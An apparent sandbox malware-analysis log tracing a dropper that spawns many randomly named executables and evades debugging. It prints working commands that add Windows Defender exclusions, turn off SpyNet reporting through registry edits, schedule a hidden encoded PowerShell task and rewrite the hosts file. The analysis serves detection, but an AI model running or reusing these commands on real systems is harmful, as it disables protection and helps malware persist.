Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Hides threads from debuggers

Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe

Code function: 32_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

32_2_00418320

Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process queried: DebugPort
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process queried: DebugPort
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	Process queried: DebugPort
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	Process queried: DebugPort
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Process queried: DebugPort
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Process queried: DebugPort

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02964668 LdrInitializeThunk,

0_2_02964668

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Code function: 32_2_0041584A SetUnhandledExceptionFilter,		32_2_0041584A
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Code function: 32_2_0041585C SetUnhandledExceptionFilter,		32_2_0041585C

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force	Jump to behavior
Source: C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

.NET source code references suspicious native API functions

Source: file.exe, yxwnHC9.cs	Reference to suspicious API methods: LoadLibrary(IebLsglFn4WrJcUGo)
Source: file.exe, yxwnHC9.cs	Reference to suspicious API methods: GetProcAddress(_51AatpG86Je0ycwxlui9XFT, t7YvAjm5RNZCcrdwH)
Source: file.exe, qgt1vdYs4pGOXLQSPHZ.cs	Reference to suspicious API methods: VirtualProtect(intPtr, (uint)array.Length, 64u, out var AVdUg1jZDhRG3nrJWMSvHe)

Modifies the hosts file

Source: C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe

File written: C:\Windows\System32\drivers\etc\hosts

Modifies Windows Defender protection settings

Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

Disables Windows Defender (deletes autostart)

Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe

Registry value deleted: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B63B5C26-9D9A-45CD-9FC0-F449F4174656}Machine\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware

Adds extensions / path to Windows Defender exclusion list

Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe c:\users\user\pictures\r1o81gotkkd0pfsduighgcl2.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6cf674f0,0x6cf67500,0x6cf6750c
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe "c:\users\user\pictures\r1o81gotkkd0pfsduighgcl2.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="c:\users\user\appdata\local\programs\opera" --profile-folder --language=en-gb --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2284 --package-dir-prefix="c:\users\user\appdata\local\temp\.opera\opera installer temp\opera_package_20231121151234" --session-guid=0bda333d-4994-4b67-9b59-0f927372c94a --server-tracking-blob=zduxmweyyzqyymu3yjnmmdi3nzrlnwm2ytg1yzy1mzdlngq4zgexmzhjnzg4mgqymthimzi4ogvlzwiyntvmndp7imnvdw50cnkioijvuyisimluc3rhbgxlcl9uyw1lijoit3blcmftzxr1cc5leguilcjwcm9kdwn0ijp7im5hbwuioijvcgvyysj9lcjxdwvyesi6ii9vcgvyys9zdgfibguvd2luzg93cy8/dxrtx21lzgl1bt1hcgimdxrtx3nvdxjjzt1ta3qmdxrtx2nhbxbhawduptc2nyisinn5c3rlbsi6eyjwbgf0zm9ybsi6eyjhcmnoijoiedg2xzy0iiwib3bzexmioijxaw5kb3dziiwib3bzexmtdmvyc2lvbii6ijewiiwicgfja2fnzsi6ikvyrsj9fswidgltzxn0yw1wijoimtcwmdu3ntk0os4ynziziiwidxrtijp7imnhbxbhawduijoinzy3iiwibwvkaxvtijoiyxbiiiwic291cmnlijoibwt0in0sinv1awqioii5zjzlmmvjms0wnzbjltrmywetodc4os01zweymjq2ndhkmtuifq== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7005000000000000
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe c:\users\user\pictures\r1o81gotkkd0pfsduighgcl2.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c4774f0,0x6c477500,0x6c47750c
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&
Source: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe	Process created: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe c:\users\user\pictures\opqtdtfbxwlk6znimrd995xd.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6b3d74f0,0x6b3d7500,0x6b3d750c
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gxuhwmamn" /sc once /st 08:40:27 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&	Jump to behavior
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe c:\users\user\pictures\r1o81gotkkd0pfsduighgcl2.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6cf674f0,0x6cf67500,0x6cf6750c
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe "c:\users\user\pictures\r1o81gotkkd0pfsduighgcl2.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="c:\users\user\appdata\local\programs\opera" --profile-folder --language=en-gb --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2284 --package-dir-prefix="c:\users\user\appdata\local\temp\.opera\opera installer temp\opera_package_20231121151234" --session-guid=0bda333d-4994-4b67-9b59-0f927372c94a --server-tracking-blob=zduxmweyyzqyymu3yjnmmdi3nzrlnwm2ytg1yzy1mzdlngq4zgexmzhjnzg4mgqymthimzi4ogvlzwiyntvmndp7imnvdw50cnkioijvuyisimluc3rhbgxlcl9uyw1lijoit3blcmftzxr1cc5leguilcjwcm9kdwn0ijp7im5hbwuioijvcgvyysj9lcjxdwvyesi6ii9vcgvyys9zdgfibguvd2luzg93cy8/dxrtx21lzgl1bt1hcgimdxrtx3nvdxjjzt1ta3qmdxrtx2nhbxbhawduptc2nyisinn5c3rlbsi6eyjwbgf0zm9ybsi6eyjhcmnoijoiedg2xzy0iiwib3bzexmioijxaw5kb3dziiwib3bzexmtdmvyc2lvbii6ijewiiwicgfja2fnzsi6ikvyrsj9fswidgltzxn0yw1wijoimtcwmdu3ntk0os4ynziziiwidxrtijp7imnhbxbhawduijoinzy3iiwibwvkaxvtijoiyxbiiiwic291cmnlijoibwt0in0sinv1awqioii5zjzlmmvjms0wnzbjltrmywetodc4os01zweymjq2ndhkmtuifq== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7005000000000000
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe c:\users\user\pictures\r1o81gotkkd0pfsduighgcl2.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c4774f0,0x6c477500,0x6c47750c
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gxuhwmamn" /sc once /st 08:40:27 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="
Source: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe	Process created: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe c:\users\user\pictures\opqtdtfbxwlk6znimrd995xd.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6b3d74f0,0x6b3d7500,0x6b3d750c

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe "C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe "C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe" --silent --allusers=0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe "C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\8AbV0HUy7VtZhy8wnNLXmsko.exe "C:\Users\user\Pictures\8AbV0HUy7VtZhy8wnNLXmsko.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe "C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe "C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\QsTe5POhA2TpmBwMLub9ymVB.exe "C:\Users\user\Pictures\QsTe5POhA2TpmBwMLub9ymVB.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe "C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe" --silent --allusers=0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\TNpJBjREJ9Gyf03FTGsVwgMm.exe "C:\Users\user\Pictures\TNpJBjREJ9Gyf03FTGsVwgMm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\6Y6HZLXw0Y38mRwaQb51f9Xr.exe "C:\Users\user\Pictures\6Y6HZLXw0Y38mRwaQb51f9Xr.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe "C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe "C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\HLT0AIxjEwuNSfgdyWiT3ueK.exe "C:\Users\user\Pictures\HLT0AIxjEwuNSfgdyWiT3ueK.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\LnQdFAFVk46H7elzEZZ3Xdvx.exe "C:\Users\user\Pictures\LnQdFAFVk46H7elzEZZ3Xdvx.exe" --silent --allusers=0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\loKi89nha4JKgsufhuKQ22oF.exe "C:\Users\user\Pictures\loKi89nha4JKgsufhuKQ22oF.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe "C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe "C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4aBHXrK8XjSbEjiL1WIQ7Kmf.bat" "	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
